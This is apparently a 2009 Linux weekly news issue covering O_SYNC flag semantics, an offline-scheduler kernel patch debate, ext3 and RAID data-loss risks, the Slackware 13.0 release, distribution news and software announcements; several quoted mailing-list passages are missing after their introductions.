Christoph Hellwig is working on a proper implementation of these flags, with an eye toward merging the changes in 2.6.32. It should be a relatively straightforward change at this point; the kernel has some nice infrastructure for handling data and metadata flushing now. What is potentially harder is making the change in a way which best meets the expectations of existing applications.
There are two unrelated issues which make this transition harder than one might expect it should be:
- Linux has never actually implemented O_SYNC; what
applications have been getting, instead, is O_DSYNC.
- The open() implementation in the kernel simply ignores flags that it knows nothing about. This behavior can be changed only at risk of breaking unknown numbers of applications; it's an aspect of the kernel ABI.
Given the first problem listed above, one might be tempted to make a new flag for O_DSYNC and use it to obtain the current behavior, while O_SYNC would get the full metadata synchronization semantics. If this were to be done, though, applications which are built against a new C library but run on an older kernel would be presenting an unknown flag to open(), which would duly ignore it. That application would not get synchronous I/O behavior at all, which is almost certainly not a good thing. So something trickier will have to be done.
There is also the question of which semantics older applications should get. Jamie Lokier argued that applications requesting O_SYNC behavior wanted full metadata synchronization, even if the kernel has been cheating them out of the full experience. So, when running under a future kernel with a proper O_SYNC implementation, an old, binary application should get O_SYNC behavior. Ulrich Drepper, instead, thinks that behavior should not change for older applications:
It looks like Ulrich's view will win out, for the simple reason that the performance cost of the additional metadata synchronization seems worse than giving applications the semantics they have been running with anyway, even if those semantics are not quite what was promised.
Christoph outlined the likely course of action. Internally, O_SYNC will become O_DSYNC, and the open() flag which is currently O_SYNC will come to mean O_DSYNC. The open() system call will then take a new flag (name unknown; O_FULLSYNC and O_ISYNC have been suggested) which will be hidden from applications. At the glibc level, applications will see this:
#define O_SYNC (O_FULLSYNC|O_DSYNC)
On older kernels, the O_DSYNC flag (with the same value as O_SYNC now) will yield the same behavior as always, while O_FULLSYNC will be ignored. On newer kernels, the new flag will yield the full O_SYNC semantics. As long as applications do not reach under the hood and try to manipulate the O_FULLSYNC flag directly, all will be well.
The offline scheduler
One of the primary functions of any kernel is to manage the CPU resources of the hardware that it is running on. A recent patch, proposed by Raz Ben-Yehuda, would change that, by removing one or more CPUs out from under the kernel's control, so that processes could run, undisturbed, on those processors. The "offline scheduler", as Ben-Yehuda calls his patch, had some rough sailing in the initial reactions to the idea, but as the thread on linux-kernel evolved, kernel hackers stepped back and looked at the problems it is trying to solve—and came up with other potential solutions.
The basic idea behind the offline scheduler is fairly straightforward: use the CPU hot-unplug facility to remove the processor from the system, but instead of halting the processor, allow other code to be run on it. Because the processor would not be participating in the various CPU synchronization schemes (RCU, spinlocks, etc.), nor would it be handling interrupts, it can completely devote its attention to the code that it is running. The idea is that code running on the offline processor would not suffer from any kernel-introduced latencies at all.
The core patch is fairly small. It provides an interface to register a function to be called when a particular CPU is taken offline:
int register_offsched(void (*offsched_callback)(void), int cpuid);
This registers a callback that will be made when the CPU with the given
cpuid
is taken offline (i.e. hot unplugged). Typically, a user would load a
module that calls register_offsched(), then take the CPU
offline which triggers the callback on the just-offlined CPU. When the
processing completes, and
the callback returns, the
processor will then be halted.
At that point, the CPU can be brought back online and returned to the
kernel's control.
The interface points to one of the problems that potential users of the offline scheduler have brought up: one can only run kernel-context, and not user-space, code using the facility. Because many of the applications that might benefit from having the full attention of a CPU are existing user-space programs, making the switch to in-kernel code is seen as problematic.
Ben-Yehuda notes that the isolated
processor has "access to every piece of memory in the system
"
and the kernel would still have access to any memory that the isolated
processor is using. He sees that as a benefit, but others, particularly
Mike Galbraith, see it differently:
One of the main problems that some kernel hackers see with the offline scheduler approach is that it bypasses Linux entirely. That is, of course, the entire point of the patch: devoting 100% of a CPU to a particular job. As Christoph Lameter puts it:
Peter Zijlstra, though, sees that as a major negative: "Going around
the kernel doesn't benefit anybody, least of all Linux.
" There are
existing ways to do the same thing, so adding one into the kernel adds no
benefit, he says:
But, Ben-Yehuda sees multiple applications for processors dedicated to
specific tasks. He envisions a different kind of system, which he calls a
Service Oriented System (SOS), where the kernel is just one component, and
if the kernel "disturbs
" a specific service, it should be
moved out of the way:
Moving the kernel out of the way is not particularly popular with many kernel hackers. But the idea of completely dedicating a processor to a specific task is important to some users. In the high performance computing (HPC) world, multiple processors spend most of their time working on a single, typically number-crunching, task. Removing even minimal interruptions, those that perform scheduling and other kernel housekeeping tasks, leads to better overall performance. Essentially, those users want the convenience of Linux running on one CPU, while the rest of the system's CPUs are devoted to their particular application.
After a somewhat heated digression about generally reducing latencies in
the kernel, Andrew Morton asked for a
problem statement: "All I've seen is 'I want 100% access to a CPU'.
That's not a problem
statement - it's an implementation.
"
In answer, Chris Friesen described one
possible application:
We gave it as close to a whole cpu as we could using cpu and irq affinity and we used message queues in shared memory to allow another cpu to handle I/O. In our case we still had kernel threads running on the app cpu, but if we'd had a straightforward way to avoid them we would have used it.
That led Thomas Gleixner to consider an
alternative approach. He restated the problem as: "Run exactly one
thread on a dedicated CPU w/o any disturbance by the
scheduler tick.
" Given that definition, he suggested a fairly simple
approach:
Gregory Haskins then suggested modifying the FIFO scheduler class, or creating a new class with a higher priority, so that it disables the scheduler tick. That would incorporate Gleixner's idea into the existing scheduling framework. As might be guessed, there are still some details to work out on running a process without the scheduler tick, but Gleixner and others think it is something that can be done.
The offline scheduler itself kind of fell by the wayside in the discussion. Ben-Yehuda, unsurprisingly, is still pushing his approach, but aside from the distaste expressed about circumventing the kernel, the inability to run user-space code is problematic. Gleixner was fairly blunt about it:
Others are also thinking about the problem, as a similar idea to Gleixner's was recently posted by Josh Triplett in an RFC to linux-kernel. Triplett's tiny patch simply disables the timer tick permanently as a demonstration of the gain in performance that can be achieved for CPU-bound processes. He notes that the overhead for the timer tick can be significant:
Triplett warns that his patch is "by no means represents a complete
solution
" in that it breaks RCU, process accounting, and other
things. But it does boot and can run his tests. He has fixes for some of
those problems in progress, as well as an overall goal: "I'd like to work towards a patch which really can kill off the timer
tick, making the kernel entirely event-driven and removing the polling
that occurs in the timer tick. I've reviewed everything the timer tick
does, and every last bit of it could occur using an event-driven
approach.
"
It is pretty unlikely that we will see the offline scheduler ever make it into the mainline, but the idea behind it has spawned some interesting discussions that may lead to a solution for those looking to eliminate kernel overhead on some CPUs. In many ways, it is another example of the perils of developing kernel code in isolation. Had Ben-Yehuda been working in the open, and looking for comments from the kernel community, he might have realized that his approach would not be acceptable—at least for the mainline—much sooner.
Ext3 and RAID: silent data killers?
Technologies such as filesystem journaling (as used with ext3) or RAID are generally adopted with the purpose of improving overall reliability. Some system administrators may thus be a little disconcerted by a recent linux-kernel thread suggesting that, in some situations, those technologies can actually increase the risk of data loss. This article attempts to straighten out the arguments and reach a conclusion about how worried system administrators should be.The conversation actually began last March, when Pavel Machek posted a proposed documentation patch describing the assumptions that he saw as underlying the design of Linux filesystems. Things went quiet for a while, before springing back to life at the end of August. It would appear that Pavel had run into some data-loss problems when using a flash drive with a flaky connection to the computer; subsequent tests done by deliberately removing active drives confirmed that it is easy to lose data that way. He hadn't expected that:
In an attempt to prevent a surge in refund requests at universities worldwide, Pavel tried to get some warnings put into the kernel documentation. He has run into a surprising amount of opposition, which he (and some others) have taken as an attempt to sweep shortcomings in Linux filesystems under the rug. The real story, naturally, is a bit more complex.
Journaling technology like that used in ext3 works by writing some data to the filesystem twice. Whenever the filesystem must make a metadata change, it will first gather together all of the block-level changes required and write them to a special area of the disk (the journal). Once it is known that the full description of the changes has made it to the media, a "commit record" is written, indicating that the filesystem code is committed to the change. Once the commit record is also safely on the media, the filesystem can start writing the metadata changes to the filesystem itself. Should the operation be interrupted (by a power failure, say, or a system crash or abrupt removal of the media), the filesystem can recover the plan for the changes from the journal and start the process over again. The end result is to make metadata changes transactional; they either happen completely or not at all. And that should prevent corruption of the filesystem structure.
One thing worth noting here is that actual data is not normally written to the journal, so a certain amount of recently-written data can be lost in an abrupt failure. It is possible to configure ext3 (and ext4) to write data to the journal as well, but, since the performance cost is significant, this option is not heavily used. So one should keep in mind that most filesystem journaling is there to protect metadata, not the data itself. Journaling does provide some data protection anyway - if the metadata is lost, the associated data can no longer be found - but that's not its primary reason for existing.
It is not the lack of journaling for data which has created grief for Pavel and others, though. The nature of flash-based storage makes another "interesting" failure mode possible. Filesystems work with fixed-size blocks, normally 4096 bytes on Linux. Storage devices also use fixed-size blocks; on traditional rotating media, those blocks are traditionally 512 bytes in length, though larger block sizes are on the horizon. The key point is that, on a normal rotating disk, the filesystem can write a block without disturbing any unrelated blocks on the drive.
Flash storage also uses fixed-size blocks, but they tend to be large - typically tens to hundreds of kilobytes. Flash blocks can only be rewritten as a unit, so writing a 4096-byte "block" at the operating system level will require a larger read-modify-write cycle within the flash drive. It is certainly possible for a careful programmer to write flash-drive firmware which does this operation in a safe, transactional manner. It is also possible that the flash drive manufacturer was rather more interested in getting a cheap device to market quickly than careful programming. In the commodity PC hardware market, that possibility becomes something much closer to a certainty.
What this all means is that, on a low-quality flash drive, an interrupted write operation could result in the corruption of blocks unrelated to that operation. If the interrupted write was for metadata, a journaling filesystem will redo the operation on the next mount, ensuring that the metadata ends up in its intended destination. But the filesystem cannot know about any unrelated blocks which might have been trashed at the same time. So journaling will not protect against this kind of failure - even if it causes the sort of metadata corruption that journaling is intended to prevent.
This is the "bug" in ext3 that Pavel wished to document. He further asserted that journaling filesystems can actually make things worse in this situation. Since a full fsck is not normally required on journaling filesystems, even after an improper dismount, any "collateral" metadata damage will go undetected. At best, the user may remain unaware for some time that random data has been lost. At worst, corrupt metadata could cause the code to corrupt other parts of the filesystem over the course of subsequent operation. The skipped fsck may have enabled the system to come back up quickly, but it has done so at the risk of letting corruption persist and, possibly, spread.
One could easily argue that the real problem here is the use of hidden translation layers to make a flash device look like a normal drive. David Woodhouse did exactly that:
The manufacturers of flash drives have, thus far, proved impervious to this line of reasoning, though.
There is a similar failure mode with RAID devices which was also discussed. Drives can be grouped into a RAID5 or RAID6 array, with the result that the array as a whole can survive the total failure of any drive within it. As long as only one drive fails at a time, users of RAID arrays can rest assured that the smoke coming out of their array is not taking their data with it.
But what if more than one drive fails? RAID works by combining blocks into larger stripes and associating checksums with those stripes. Updating a block requires rewriting the stripe containing it and the associated checksum block. So, if writing a block can cause the array to lose the entire stripe, we could see data loss much like that which can happen with a flash drive. As a normal rule, this kind of loss will not occur with a RAID array. But it can happen if (1) one drive has already failed, causing the array to run in "degraded" mode, and (2) a second failure occurs (Pavel pulls the power cord, say) while the write is happening.
Pavel concluded from this scenario that RAID devices may actually be more dangerous than storing data on a single disk; he started a whole separate subthread (under the subject "raid is dangerous but that's secret") to that effect. This claim caused a fair amount of concern on the list; many felt that it would push users to forgo technologies like RAID in favor of single, non-redundant drive configurations. Users who do that will avoid the possibility of data loss resulting from a specific, unlikely double failure, but at the cost of rendering themselves entirely vulnerable to a much more likely single failure. The end result would be a lot more data lost.
The real lessons from this discussion are fairly straightforward:
- Treat flash drives with care, do not expect them to be more reliable
than they are, and do not remove them from the system until all writes
are complete.
- RAID arrays can increase data reliability, but an array which is not
running with its full complement of working, populated drives has lost
the redundancy which provides that reliability. If the consequences
of a second failure would be too severe, one should avoid writing to
arrays running in degraded mode.
- As Ric Wheeler pointed out, the
easiest way to lose data on a Linux system is to run the disks with
their write cache enabled. This is especially true on RAID5/6
systems, where write barriers are still not properly supported. There
has been some talk of
disabling drive write caches and enabling barriers by default, but no
patches have been posted yet.
- There is no substitute for good backups. Your editor would add that any backups which have not been checked recently have a strong chance of not being good backups.
How this information will be reflected in the kernel documentation remains to be seen. Some of it seems like the sort of system administration information which is not normally considered appropriate for inclusion in the documentation of the kernel itself. But there is value in knowing what assumptions one's filesystems are built on and what the possible failure modes are. A better understanding of how we can lose data can only help us to keep that from actually happening.
Patches and updates
Kernel trees
Architecture-specific
Core kernel code
Development tools
Device drivers
Filesystems and block I/O
Memory management
Networking
Security-related
Virtualization and containers
Miscellaneous
Page editor: Jonathan Corbet
Distributions
News and Editorials
Slackware 13.0: now officially 64-bit
Patrick Volkerding has announced the release of Slackware 13.0, which means that Slackware continues its record as the oldest Linux distribution to be actively maintained. Compared with release 12.2 from the end of last year, Slackware has undergone a major overhaul: X can be autoconfigured now, this is the first 64-bit release, and the desktop environment has taken the leap to the KDE 4 branch.
64-bit and multilib
In particular, the 64-bit release is a big change. While many other distributions have already had x86_64 releases for years, Slackware users were forced to wait for a x86_64 port or choose an unofficial 64-bit project such as Slamd64 or Sflack. Now they can officially join their peers in 64-bit world. This is largely due to Eric Hameleers, who changed the SlackBuild scripts to support the x86_64 architecture, re-compiled everything, tested the 64-bit packages, and stayed in-sync with the 32-bit Slackware repository. His improvements of the build scripts were even imported over to the 32-bit Slackware release. Now the only difference is whether $ARCH is set to i486 or x86_64. Hameleers's build scripts are used in other ports too, such as Armedslack, the official port of Slackware to the ARM architecture, as well as Slack/390, a port for IBM S/390 G2 class systems and above. Slackware developers are already dreaming about a unified source tree for different ports.
Users should know that the x86_64 port of Slackware is a pure 64-bit operating system, but it is "multilib-ready". Hameleers explains this on his website:
Moreover, users don't have to compile all the 32-bit packages they need
from scratch; they can simply take them from the 32-bit Slackware package
tree. The only thing the user has to do to create a multilib Slackware64
install is to upgrade gcc and glibc to their multilib versions and install a
32-bit compatibility toolkit, compat32-tools. Detailed
instructions can be found on Hameleers' website. The whole process is
not as simple as it could be, but it's done "the Slack way
":
Slackware is multilib-ready and lets the user choose how to make use of
it.
KDE 4
Another big change is the move from KDE 3 to KDE 4, which has been out for about a year and a half now. The always conservative Volkerding explains why the time is ripe now for the move:
However, Volkerding notes KDE 4 has still some quirks. There are reports that the CD-burning tool K3b hasn't been working as well as the KDE 3 version, and other applications have less features in the KDE 4 versions. That's why Slackware keeps some KDE 3 compatibility packages in /extra/kde3-compat/, including a KDE 3 version of K3b.
By the way, GNOME users aren't completely left out. Although the GNOME desktop environment was removed from Slackware in 2005, several community-based projects have filled the gap. For example, GNOME SlackBuild has released an up-to-date GNOME 2.26.3 for Slackware 13.
Installation
The text-mode installer has remained largely unchanged. It lets the user choose a non-US keyboard map and try out the keyboard layout before committing to it. Then the user has to prepare the disk partitions (e.g. with fdisk or cfdisk) and type setup to begin the installation process. The installer makes use of virtual consoles: the first three consoles are login consoles, while the fourth console shows informational messages such as disk formatting status and kernel messages. The login consoles come in handy during the installation, e.g. to check how full the hard drive is with df or to use the commands on the Slackware CD-ROM that is mounted on /cdrom.
The installation is straightforward: the user selects the root partition, formats it, creates the filesystem of his choice (Ext4 is selected by default), selects the source medium, and chooses the packages to install. For a full-blown KDE 4 installation, the simplest way is to choose "Full" in the KDE list. Then all packages get installed, with each showing an information window while installing. A disadvantage of the installer is that it doesn't show a progress bar, letting the user guess how long he has to wait. After that, the user gets the option to create a USB boot stick for recovery purposes, and Slackware installs the LILO boot loader. After that, the user configures the system and chooses the desktop environment.
Under the hood, the Slackware installer has implemented some changes. For example, it now uses udev to populate /dev and manage devices, including network interface cards. This means that the user no longer has to run network scripts prior to running setup. If the installer finds a DHCP server on the local network, the setup program lets the user choose between using DHCP or specifying a static IP address. For those who don't want to use udev, it's still possible to use the old Slackware hardware configuration scripts by adding the parameter noudev to the installer command line.
Back on track
Slackware features Linux kernel 2.6.29.6, GNU libc 2.9, KDE 4.2.4, Xfce 4.6.1, Firefox 3.5.2, Thunderbird 2.0.0.23, Gimp 2.6.6, and a lot of other recent packages. Look at the complete list of packages or the list of changes and hints for detailed information. Slackware 13 uses X.Org X Server 1.6.3, which means that it doesn't require an /etc/X11/xorg.conf in most cases. Input devices are configured by HAL, while the X server autoconfigures the rest. With the move to HAL in Slackware 12 and the autoconfigurable X server in Slackware 13, more and more things are now working out-of-the-box.
Slackware is known for its conservative choices, and the move to KDE 4.2 signifies that even the conservative Volkerding deems the new KDE 4 branch to be good enough. However, while almost all Linux distributions are using GRUB now and some are even moving to GRUB 2, Slackware 13 is still lagging behind with its use of the LILO boot loader by default. The developers surely will have reasons for it (Slackware holds to the "tried and true" standard for what gets included in the distribution), but all in all, Slackware seems to be back on track with other recent distributions without belying its nature of a BSD-like Linux distribution.
New Releases
Slackware 13.0 released
The Slackware 13.0 release is out. "Probably the biggest change is the addition of an official 64-bit port. While the 32-bit (x86) version continues to be developed, this release brings to you a complete port to 64-bit (x86_64). We know that many of you have been waiting eagerly for this, and once you try it you'll see it was well worth the wait." See the release notes for more information.
RHEL 5.4 released
Red Hat Enterprise Linux 5.4 is out. They have folded a lot of changes into this release, including x86_64 KVM support, FUSE, the XFS filesystem, a number of SystemTap enhancements, and a lot of driver updates; see the release notes for details.
For CentOS users: the word is that CentOS
5.4 will be available "in 2-4 weeks or so, when
it's ready
"
The first Lubuntu test images are available
The Lubuntu project has announced the availability of its first test images. "The Lubuntu project started in March 2009, with the purpose of creating a lighter and less resource demanding alternative to the Xubuntu operating system, using the LXDE desktop environment. The ultimate goal of this project is to join the ranks of Kubuntu and Xubuntu and become an officially supported derivative of Ubuntu. The developers claim that, while Xubuntu is often represented as a lightweight distro, it actually fails to run on older hardware, so they are targeting their Linux distribution at older legacy computers and devices with less than 256 MB of RAM."
Version 2.4.37.5 of Crash Recovery Kit for Linux
The Crash Recovery Kit project has released CRK for Linux v2.4.37.5. "CRK v.2.4.37.5-rh73 i386, is based upon RedHat 7.3 i386. The kernel is patched with linux-2.4.37.5-e1000e.patch.bz2, based on the Intel driver v0.5.11.2, for Intel(R) PRO/1000 PCIe Gigabit Ethernet and works with the Intel 82574L PCIe Gigabit card."
Distribution News
Debian GNU/Linux
New NM Front-desk Member
The Debian New-Maintainer Front-desk has announced that Enrico Zini has joined the team.
Fedora
The Fedora Project and IPv6
The Fedora Project has announced that major segments of fedoraproject.org and the Fedora Project infrastructure now support IPv6. "We will continue to further expand support for IPv6 over the next several months wherever possible. Most of our self-hosted websites have already been converted, and we plan to include IPv6 GeoIP support in MirrorManager soon."
Gentoo Linux
Gentoo Council Meeting Summary
Click below for a summary of the August 17, 2009 meeting of the Gentoo Council. Topics include Gentoo's tenth anniversary.
Ubuntu family
Ubuntu TechBoard 2009
The Ubuntu Technical Board elections have been completed. Elected to the new board are Matt Zimmerman, Mark Shuttleworth, Scott James Remnant, Martin Pitt and Kees Cook.
Other distributions
MontaVista Announces New Market Specific Distributions
MontaVista has announced the general availability of new Market Specific Distributions for MontaVista Linux 6. These distributions support numerous ARM, Intel, Freescale, MIPS and Xilinx platforms.
Distribution Newsletters
DistroWatch Weekly, Issue 318
The DistroWatch Weekly for August 31, 2009 is out. "Operating systems come in many different shapes and sizes. While there is no shortage of projects seemingly wanting to test the upper limits of modern hardware requirements, it's not every day that we discover exactly the opposite. Welcome to Kolibri - a bootable operating system in under 3 MB of download, requiring just 5 MB of hard disk space and less than 10 MB of RAM! Read on to find out more about this extraordinary project. In the news section, Slackware hits the magic 13 with a plethora of new features, Fedora announces the inclusion of a Moblin subsystem into its upcoming version 12, ClarkConnect undergoes a name change and renews its commitment to open source, Arch Linux introduces a new server-oriented kernel for better long term support, and BeleniX launches an early alpha build of its OpenSolaris-based distribution featuring KDE 4. Finally, if you run FreeBSD and want to keep your installed system constantly updated, don't miss a great document describing the various options. Happy reading!"
Fedora Weekly News 191
The Fedora Weekly News for August 30, 2009 is out. "We kick off this week's issue with the latest news on the Fedora 12 Alpha release from this past Tuesday, as well as detail on the upcoming Red Hat/Fedora/JBoss conference in Brno, Czech Republic. News from the Marketing team includes logs of the recent weekly meeting, Fedora 12 talking points development, and a Fedora Insight update. In Quality Assurance news, detail from last week's Test Day, on Dracut, and the next Test Day this week on Sugar on a Stick. Also much detail on this week's QA meetings, and reporting on the ABRT Test Day. In Translation news, detail on a new version of Transifex, and coverage of some discussion of the prioritization of packages available for translation. News from the Design team includes a new Fedora 12 Alpha banner and news on a Fedora survey aimed to improve the usability of the Fedora download pages. These are just a few items from this week's FWN!"
OpenSUSE Weekly News/86
This issue of the OpenSUSE Weekly News covers openSUSE 11.2 Milestone 6 Released, Jan Weber: Summary of openSUSE @ FrOSCon 2009, Linux.com/RobDay: The Kernel Newbie Corner: Kernel Debugging with proc "Sequence" Files--Part 2, Will Stephenson: Sub-menus in KDE 4 panels and desktops are back, h-online/Thorsten Leemhuis: Kernel Log - Coming in 2.6.31 - Part 4: Tracing, architecture, virtualisation, and more.Ubuntu Weekly Newsletter #157
The Ubuntu Weekly Newsletter for August 29, 2009 is out. "In this issue we cover: Karmic: Feature Freeze in place - Alpha 5 freeze ahead, Ubuntu Pennsylvania Open Source Conference, Ubuntu Arizona Installfest, Ubuntu Mexico Podcast #1, Ubuntu Georgia UbuCon at Atlanta Linuxfest, Launchpad news, Ubuntu Forums news, Ubuntu at Parliament of Zimbabwe, Full Circle Magazine #28, Ubuntu UK podcast: Slipback, August 2009 Team Reports, and much, much more!"
Distribution reviews
SAM Linux - Great little OS (TuxMachines.org)
Susan Linton reviews SAM Linux. "SAM is based on PCLOS and as such retains some of the telltale signs - some application splash screens, the PCLOS/Mandriva hard drive installer, Synaptic, and PCLOS' version of the Mandriva Control Center. These are great and probably indispensable, but it's the uniquely SAM characteristics that really seemed to shine."
Revisiting Linux Part 1: A Look at Ubuntu 8.04 (AnandTech)
AnandTech has a lengthy look at Ubuntu 8.04 LTS from a Windows user's perspective. "[This article is] first and foremost a review of Ubuntu 8.04. And with 9.04 being out, I'm sure many of you are wondering why we're reviewing anything other than the latest version of Ubuntu. The short answer is that Ubuntu subscribes to the "publish early, publish often" mantra of development, which means there are many versions, not all of which are necessarily big changes. 8.04 is a Long Term Support release; it's the most comparable kind of release to a Windows or Mac OS X release. This doesn't mean 9.04 is not important (which is why we'll get to it in Part 2), but we wanted to start with a stable release, regardless of age. We'll talk more about this when we discuss support."
Page editor: Rebecca Sobol
Development
The OpenEnergyMonitor project
The
OpenEnergyMonitor
project is based on the work of
two developers,
Trystan Lea and Suneil, both from Wales.
"This is a project to develop and build open source energy monitoring and analysis tools for energy efficiency and distributed renewable microgeneration.
"
The project appears to have been launched in the summer of 2009.
The OpenEnergyMonitor project's graphic [PDF] describes the goals, which include:
- Monitoring AC mains for energy analysis purposes.
- Energy prediction for renewable energy feasibility studies (Planned).
- Monitoring energy captured from wind, solar water and photovoltaic sources.
- Storage, analysis and display of energy usage data.
- Development of energy technologies.
- The export of energy usage information to the Internet (Planned).
The OpenEnergyMonitor site lists several example projects:
- Non-invasive AC mains current measurement
- Invasive AC mains power measurement
- Invasive 12V DC power measurement
- load controller for small wind generators
OpenEnergyMonitor features a simple structure that is built from a variety of open-source hardware and software components. The data flow through the system starts with an Arduino processor and a custom built I/O shield for interfacing the analog signal to the Arduino. The Arduino sends data to the host computer via a USB serial connection.
The project provides several ways to collect and display the power data. The simpler batch mode works as follows: The ArduinoComm Java program can be used to copy a batch of recorded data to a file using a command such as:
$ java ArduinoComm >tmp.dat
Graphing of the captured data can be done with the KDE utility
kst, see the
Using KST for graphing document for details.
A more interactive real time display can be achived using the PowerLogger and PowerSampler Java programs. A test installation of both programs was performed on an Ubuntu 9.04 system. The OpenEnergyMonitor java software guide was followed. Each program requires installation of the associated Arduino program (sketch) on the Arduino board. Your author had several Arduino Deicimila boards around from other projects and an already installed version 17 of the Arduino IDE. The Arduino Power Logger program (sketch) was retrieved, compiled and installed on the Deicimila board without any problems.
Next, Java was installed on the machine along with the RXTX serial/parallel communication library. The Java code was compiled and run with the java ContinuousPower command. The ContinuousPower GUI showed up and after clicking on the Start button, the Arduino status indicated that a connection was established and an a flow of data was seen from the Arduino board. The real time graph's X axis changed with advancing time and the data changed slightly due to noise. Unfortunately, your author did not have the parts on hand to construct an input shield board, so monitoring of some real data was not possible. The PowerSampler program was compiled and installed with similar results.
For more information on the inner workings of the Java software, see the Power Logger Source Code Guide and the Program Structure and Data Flow Diagram. The latter explains both the Power Logger and Power Sampler Java programs since both share a large percentage of source code.
OpenEnergyMonitor is an interesting project in the early stages of development. It comes along at a time when the renewable energy field is seeing a lot of growth, and efficiency monitoring of non-renewable sources is becoming more important for both financial and ecological reasons. Hopefully, future releases of OpenEnergyMonitor will include a wider variety of supported sensor devices. A multi-channel temperature monitor would be useful for characterizing a variety of solar energy sources such as photovoltaic, hydronic (hot water) and solar-heated air panels.
The OpenEnergyMonitor project could also be useful for providing a base of working code for a more generic Arduino-based data logger, and the real-time data visualization capabilities are an added bonus. A thread on the Arduino forum about an Open Source Data Logger Project Using the Arduino indicates some potential interest, but that project apparently never got off the ground.
System Applications
Audio Projects
ALSA 1.0.21 released
Version 1.0.21 of the ALSA audio server has been announced, see the change log for details.MPD 0.15.3 released
Version 0.15.3 of MPD, a server-side application for playing music, has been announced. "Improves update speed and fixes an audio stuttering bug."
Database Software
PostgreSQL Weekly News
The August 30, 2009 edition of the PostgreSQL Weekly News is online with the latest PostgreSQL DBMS articles and resources.
Networking Tools
RunPON 0.4 released
Version 0.4 of RunPON has been announced. "In this version: introduced a .INI configuration file and a GUI to handle it. Morevover, it's possible to keep track of the cumulative connection time. RunPON is a small Python program useful to run the pon/poff scripts. It shows the elapsed connection time and periodically checks if a given network interface is still active."
Printing
CUPS 1.4.0 released
Version 1.4.0 of the CUPS printing system has been announced. "CUPS 1.4.0 adds over 67 changes and new features to CUPS 1.3.11, including improved Bonjour/DNS-SD support, supply level and status reporting for network printers via SNMP, an improved web interface, and the CUPS DDK tools."
Desktop Applications
Accessibility
Alt_Key 2.2.1 released
Version 2.2.1 of Alt_Key has been announced. "Alt_Key is a GUI program that shows where keyboard accelerators should go in menu option texts and dialog labels. The program instantly produces optimal results on the basis that the best accelerator is the first character, the second best is the first character of a word, the third best is any character, the worst is no accelerator at all, and no accelerator should be used more than once. With this program developers can help improve usability for users who can't use the mouse and for fast typists who don't want to use the mouse."
Audio Applications
Audacity 1.3.9 beta released
Beta version 1.3.9 of the Audacity audio editor has been announced. "It contains many bug fixes contributed by our two Google Summer of Code (GSoC) 2009 students, and brings us much closer to the goal of a new Stable 2.0 release."
QARecord 0.5.0 released
Version 0.5.0 of QARecord has been announced, it adds a number of new capabilities. "QARecord is a simple but solid recording tool. It works well with stereo and multichannel recordings, supporting ALSA and JACK interfaces and in both 16 bit and 32 bit mode. By using a large ringbuffer for the captured data, buffer overruns are avoided. It has a Qt based GUI with graphical peak meters."
Desktop Environments
GNOME Software Announcements
The following new GNOME software has been announced this week:- anjuta 2.27.91 (bug fixes)
- Byzanz 0.2.0 (new features and bug fixes)
- gitg 0.0.5 (bug fixes)
- GLib 2.20.5 (bug fixes and translation work)
- glibmm 2.21.4.1 (code cleanup and documentation work)
- glibmm 2.21.4.2 (build fix)
- gnome-main-menu 0.9.13 (bug fixes and translation work)
- GNOME Shell 2.27.1 (new features, bug fixes and translation work)
- GTK+ 2.16.6 (bug fixes and translation work)
- GTK+ 2.17.10 (new features, bug fixes and translation work)
- gtkmm 2.17.9.3 (documentation work)
- Libgda 4.0.4 (bug fixes)
- libgdamm 3.99.17.1 (code cleanup and documentation work)
- libsigc++ 2.2.4.1 (code cleanup and documentation work)
- libsigc++ 2.2.4.2 (documentation work)
- librsvgmm 2.26.0.1 (bug fix)
- mm-common 0.7.1 (bug fix)
- mm-common 0.7.2 (documentation work)
- Mutter 2.27.3 (new features and bug fixes)
- pangomm 2.25.1.3 (documentation work)
- PyClutter 1.0.0 (new features and code cleanup)
- rep-gtk 0.90.0 (new features and code cleanup)
- sawfish 1.5.1 (bug fixes)
- Tic tac toe 0.3.1 (initial release)
KDE 4.3.1 provides a wave of improvements
Version 4.3.1 of KDE has been announced. "A month has passed since the release of KDE 4.3.0, so today the KDE Community announces the immediate availability of KDE 4.3.1, a bugfix, translation and maintenance update for the latest generation of the most advanced and powerful free desktop."
KDE Software Announcements
The following new KDE software has been announced this week:- digiKam 1.0.0-beta4 (unspecified)
- eXaro 2.0.0 (translation work)
- KAlarm 2.3.1 (new features and bug fixes)
- KDE Four Live 1.3.1 (updated to KDE 4.3.1 release)
- Kipi-Plugins 0.6.0 (unspecified)
- Linux unified kernel 0.2.4.1 (new features and bug fixes)
- Minitube 0.5 (unspecified)
- Qubladi Alpha (initial release)
- servicemenu-pdf 0.3.4 (bug fixes)
- Skrooge 0.5.0 (new features and bug fixes)
- System Monitor 2 1.0.3 (new features and bug fixes)
- WiFi Radar 2.0.s06 (unspecified)
Xorg Software Announcements
The following new Xorg software has been announced this week:- applewmproto 1.4.1 (packaging changes)
- bigreqsproto 1.1.0 (packaging changes)
- damageproto 1.2.0 (packaging changes and documentation work)
- dmxproto 2.2.99.1 (packaging changes)
- evieext 1.1.0 (packaging changes)
- fontsproto 2.1.0 (packaging changes)
- libAppleWM 1.4.0 (header changes)
- libdmx 1.0.99.1 (header changes and documentation work)
- libdrm 2.4.13 (new features and bug fixes)
- libfontenc 1.0.5 (bug fixes and documentation work)
- libICE 1.0.6 (bug fixes and documentation work)
- libpciaccess 0.10.7 (new features and bug fixes)
- libpciaccess 0.10.8 (bug fix)
- libXau 1.0.5 (new features and code cleanup)
- libXcursor 1.1.10 (code cleanup and documentation work)
- libXinerama 1.0.99.1 (code cleanup and documentation work)
- libXxf86dga 1.0.99.1 (code cleanup and documentation work)
- libXxf86vm 1.0.99.1 (code cleanup and documentation work)
- pixman 0.16.0 (new features and code cleanup)
- videoproto 2.3.0 (packaging changes)
- xcmiscproto 1.2.0 (packaging changes)
- xf86bigfontproto 1.2.0 (packaging changes)
- xf86dgaproto 2.0.99.1 (packaging changes)
- xf86driproto 2.1.0 (packaging changes)
- xf86-video-geode 2.11.4 (bug fixes, code cleanup and documentation work)
- xf86-video-geode 2.11.4.1 (bug fix)
- xf86-video-glide 1.0.3 (code cleanup)
- xf86vidmodeproto 2.2.99.1 (packaging changes)
- xineramaproto 1.1.99.1 (packaging changes)
Electronics
gEDA/gaf 1.5.4-20090830 released
Unstable development snapshot 1.5.4-20090830 of gEDA/gaf, a collection of electronic design and analysys tools, has been announced. "gEDA/gaf v1.5.3 had some release critical bugs (DOA) so it has been withdrawn and is no longer available for download. Please download, build, and run gEDA/gaf v1.5.4."
